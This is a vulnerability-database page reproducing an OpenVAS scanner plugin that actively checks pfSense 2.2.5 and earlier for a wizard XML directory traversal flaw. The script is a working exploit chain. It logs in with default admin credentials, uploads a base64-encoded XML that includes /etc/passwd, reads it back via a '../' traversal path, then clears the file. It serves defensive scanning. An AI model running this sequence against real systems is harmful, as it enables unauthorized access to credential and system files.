Lucene search
+L

pfSense <= 2.2.5 Wizard XML Directory Traversal Vulnerability - Active Check

🗓️ 14 Jan 2016 00:00:00Reported by Copyright (C) 2016 Greenbone AGType 
openvas
 openvas
🔗 plugins.openvas.org👁 128 Views

pfSense <= 2.2.5 Wizard XML Directory Traversal Vulnerabilit

Refs
Code
# SPDX-FileCopyrightText: 2016 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

CPE = "cpe:/a:pfsense:pfsense";

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.806806");
  script_version("2025-09-09T14:09:45+0000");
  script_tag(name:"last_modification", value:"2025-09-09 14:09:45 +0000 (Tue, 09 Sep 2025)");
  script_tag(name:"creation_date", value:"2016-01-14 18:46:02 +0530 (Thu, 14 Jan 2016)");
  script_tag(name:"cvss_base", value:"7.5");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:S/C:C/I:P/A:P");
  script_name("pfSense <= 2.2.5 Wizard XML Directory Traversal Vulnerability - Active Check");
  script_category(ACT_ATTACK);
  script_family("Web application abuses");
  script_copyright("Copyright (C) 2016 Greenbone AG");
  script_dependencies("gb_pfsense_consolidation.nasl");
  script_require_ports("Services/www", 443);
  script_mandatory_keys("pfsense/http/detected");

  script_xref(name:"URL", value:"http://seclists.org/fulldisclosure/2015/Dec/78");
  script_xref(name:"URL", value:"https://www.exploit-db.com/exploits/39038");
  script_xref(name:"URL", value:"https://github.com/pfsense/pfsense/commit/3ac0284805ce357552c3ccaeff0a9aadd0c6ea13");

  script_tag(name:"summary", value:"pfSense is prone to a directory traversal vulnerability.");

  script_tag(name:"vuldetect", value:"Sends a crafted XML file via HTTP POST and checks whether we
  can gain command execution.");

  script_tag(name:"insight", value:"Multiple flaws are due to:

  - wizard.php file do not sanitize the path of the xml parameter

  - pkg.php file do not sanitize the path of the xml parameter");

  script_tag(name:"impact", value:"Successful exploitation will allow a remote attacker to obtain
  access by leveraging knowledge of the credentials and launch further attacks including XML
  External Entity (XXE) injection attacks.");

  script_tag(name:"affected", value:"pfSense version 2.2.5 and earlier.");

  script_tag(name:"solution", value:"Apply the fix provided by the vendor via the references.");

  script_tag(name:"qod_type", value:"remote_vul");
  script_tag(name:"solution_type", value:"VendorFix");

  exit(0);
}

include("host_details.inc");
include("http_func.inc");
include("http_keepalive.inc");

if(!port = get_app_port(cpe:CPE, service:"www"))
  exit(0);

if(!dir = get_app_location(cpe:CPE, port:port))
  exit(0);

if(dir == "/")
  dir = "";

useragent = http_get_user_agent();
host = http_host_name(port:port);

url = dir  + "/index.php";
req1 = http_get(item:url, port:port);
res1 = http_keepalive_send_recv(port:port, data:req1);

if(res1 && "PHPSESSID" >< res1) {

  cookie1 = eregmatch(pattern:"PHPSESSID=([0-9a-zA-Z]+);", string:res1);
  if(!cookie1[1])
    exit(0);

  sid = eregmatch(pattern:"sid:([a-zA-Z0-9\,a-zA-Z0-9]+)", string:res1);
  if(sid)
   fp = split(sid[1], sep:",", keep:FALSE);

  post_data = "__csrf_magic=sid%3A" + fp[0] + "%2C" + fp[1] + "&usernamefld=admin&passwordfld=pfsense&login=Login";
  len = strlen(post_data);

  req2 = 'POST ' + url + ' HTTP/1.1\r\n' +
         'User-Agent: ' + useragent + '\r\n' +
         'Host: ' + host + '\r\n' +
         'Cookie: PHPSESSID=' + cookie1[1] + '\r\n' +
         'Content-Type: application/x-www-form-urlencoded\r\n' +
         'Content-Length: ' + len + '\r\n' +
         '\r\n' +
         post_data;
  res2 = http_keepalive_send_recv(port:port, data:req2);

  if(!res2 || res2 !~ "^HTTP/1\.[01] 302")
    exit(0);

  cookie2 = eregmatch(pattern:"PHPSESSID=([0-9a-zA-Z]+);", string:res2);
  if(!cookie2[1])
    exit(0);

  url = dir + "/edit.php";
  req3 = 'GET ' + url + ' HTTP/1.1\r\n' +
         'User-Agent: ' + useragent + '\r\n' +
         'Host: ' + host + '\r\n' +
         'Cookie: PHPSESSID=' + cookie2[1] + '\r\n' +
         '\r\n';
  res3 = http_keepalive_send_recv(port:port, data:req3);

  if(res3 && "sid" >< res3)
    sid2 = eregmatch(pattern:"sid:([a-zA-Z0-9\,a-zA-Z0-9]+)", string:res3);

  if(!sid2[0])
    exit(0);

  post_data2 = "__csrf_magic=" + sid2[0] + "&action=save&file=/obc.xml&data=PD94bWwg" +
               "dmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiID8%2BCjxwZnNlbnNld2l6YX" +
               "JkPgo8dG90YWxzdGVwcz4xMjwvdG90YWxzdGVwcz4KPHN0ZXA%2BCjxpZD4xPC9p" +
               "ZD4KPHRpdGxlPkxGSSBleGFtcGxlIDwvdGl0bGU%2BCjxkZXNjcmlwdGlvbj5MZm" +
               "kgZXhhbXBsZSA8L2Rlc2NyaXB0aW9uPgo8ZGlzYWJsZWhlYWRlcj5vbjwvZGlzYW" +
               "JsZWhlYWRlcj4KPHN0ZXBzdWJtaXRwaHBhY3Rpb24%2Bc3RlcDFfc3VibWl0cGhw" +
               "YWN0aW9uKCk7PC9zdGVwc3VibWl0cGhwYWN0aW9uPgo8aW5jbHVkZWZpbGU%2BL2" +
               "V0Yy9wYXNzd2Q8L2luY2x1ZGVmaWxlPgo8L3N0ZXA%2BCjwvcGZzZW5zZXdpemFy" +
               "ZD4=";
  len2 = strlen(post_data2);

  url = dir + "/edit.php";
  req4 = 'POST ' + url + ' HTTP/1.1\r\n' +
         'User-Agent: ' + useragent + '\r\n' +
         'Host: ' + host + '\r\n' +
         'Content-Type: application/x-www-form-urlencoded; charset=UTF-8\r\n' +
         'X-Requested-With: XMLHttpRequest\r\n' +
         'Referer: https://' + host + '/edit.php\r\n' +
         'Content-Length: ' + len2 + '\r\n' +
         'Cookie: PHPSESSID=' + cookie2[1] + '\r\n' +
         '\r\n' +
         post_data2;
  res4 = http_keepalive_send_recv(port:port, data:req4);

  if("File successfully saved" >< res4) {

    url = dir + "/wizard.php?xml=../../../../../../../obc.xml";

    req5 = 'GET ' + url + ' HTTP/1.1\r\n' +
           'User-Agent: ' + useragent + '\r\n' +
           'Host: ' + host + '\r\n' +
           'Cookie: PHPSESSID=' + cookie2[1] + '\r\n' +
           'Connection: keep-alive\r\n' +
           '\r\n';
    res5 = http_keepalive_send_recv(port:port, data:req5);

    if("root" >!< res5)
      exit(0);

    # nb: Empty the content of uploaded file
    url = dir + "/edit.php";
    req6 = 'GET ' + url + ' HTTP/1.1\r\n' +
           'User-Agent: ' + useragent + '\r\n' +
           'Host: ' + host + '\r\n' +
           'Cookie: PHPSESSID=' + cookie2[1] + '\r\n' +
           '\r\n';

    res6 = http_keepalive_send_recv(port:port, data:req6);
    if(res6 && "sid" >< res6)
      sid3 = eregmatch( pattern:"sid:([a-zA-Z0-9\,a-zA-Z0-9]+)", string:res6);

    post_data3 = "__csrf_magic=" + sid3[0] + "&action=save&file=/obc.xml&data=";
    len3 = strlen(post_data3);

    url = dir + "/edit.php";
    req7 = 'POST ' + url + ' HTTP/1.1\r\n' +
           'User-Agent: ' + useragent + '\r\n' +
           'Host: ' + host + '\r\n' +
           'Content-Type: application/x-www-form-urlencoded; charset=UTF-8\r\n' +
           'X-Requested-With: XMLHttpRequest\r\n' +
           'Referer: https://' + host + '/edit.php\r\n' +
           'Content-Length: ' + len3 + '\r\n' +
           'Cookie: PHPSESSID=' + cookie2[1] + '\r\n' +
           '\r\n' +
           post_data3;
    res7 = http_keepalive_send_recv(port:port, data:req7);

    if("File successfully saved" >!< res7)
      exit(0);

    if("root" >< res5 && "File successfully saved" >< res7) {
      report = http_report_vuln_url(port:port, url:url);
      report = report + "\r\nPlease remove the ovs.xml file manually from the application";
      security_message(port:port, data:report);
      exit(0);
    }
  }
}

exit(99);

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation